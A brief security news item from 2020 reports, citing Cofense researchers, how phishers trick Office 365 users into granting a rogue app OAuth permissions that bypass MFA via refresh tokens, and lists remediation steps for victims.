Phishers are trying to bypass Office 365 MFA via rogue apps

2020-05-19 13:12

Phishers are trying to bypass the multi-factor authentication protection on users' Office 365 accounts by tricking them into granting permissions to a rogue application.

How? The aforementioned authorization code is exchanged for an access token that is presented by the rogue application to Microsoft Graph, which will authorize its access.

"Applications that want to access Office 365 data on behalf of a user do so through Microsoft Graph authorizations. However, they must first obtain an access token from the Microsoft Identity Platform," Cofense researchers explained.

The access token the rogue app receives and uses will expire after a while, but the app has also been granted the permission to obtain refresh tokens, which can be exchanged for new access tokens, meaning that the app will able to retain access potentially indefinitely.

Once the rogue app's access is revoked, victims must change their O365 account password and check whether the attackers have switched off MFA protection or modified some of its settings/options.

News URL

http://feedproxy.google.com/~r/HelpNetSecurity/~3/Y_pngiQtDO4/

#bypass #MFA #office #office365 #phisher